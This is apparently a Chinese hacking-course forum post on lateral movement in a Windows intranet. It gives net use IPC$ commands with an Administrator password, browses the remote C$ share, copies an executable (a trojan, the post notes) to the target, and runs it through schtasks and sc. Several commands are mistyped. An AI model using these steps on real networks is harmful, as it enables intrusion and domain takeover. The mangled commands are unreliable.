五,横向移动-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

五,横向移动

[复制链接]
发表于 2023-7-25 20:21:57 | 显示全部楼层 |阅读模式
解释:,你已经拥有哪里内网中某一台主机的权限,想要扩大战果,获取域管理权限。
方法:
1)IPC 入侵(Inter-Process Communication) 进程间通信
命令 net use
fakename.png
实例:
net use \\192.168.100.138\IPC$ "bihuo.cn" /user:Administrator
fakename.png

利用IPC建立的链接,可以直接远程访问想要访问到的文件目录。
建立IPC后,可以直接打开共享目录。
fakename.png

也可以命令行中执行:dir \\192.168.100.138\c$
fakename.png

也可以copy一个可执行程序(木马后门也可以)到目标目录
copy c:/windows/system32/calc.exe //192.168.100.138 c$
fakename.png

建立定时任务执行程序
schtasks /create /S 192.168.100.138 /SC minute TN sch_test TR C:/calc.exe /ST 21:08

利用sc创建任务
sc \\192.168.100.138 create ipc_test binPath= "cmd.exe /c C:\clac.exe"
执行任务
sc \\192.168.100.138 start ipc_test











回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表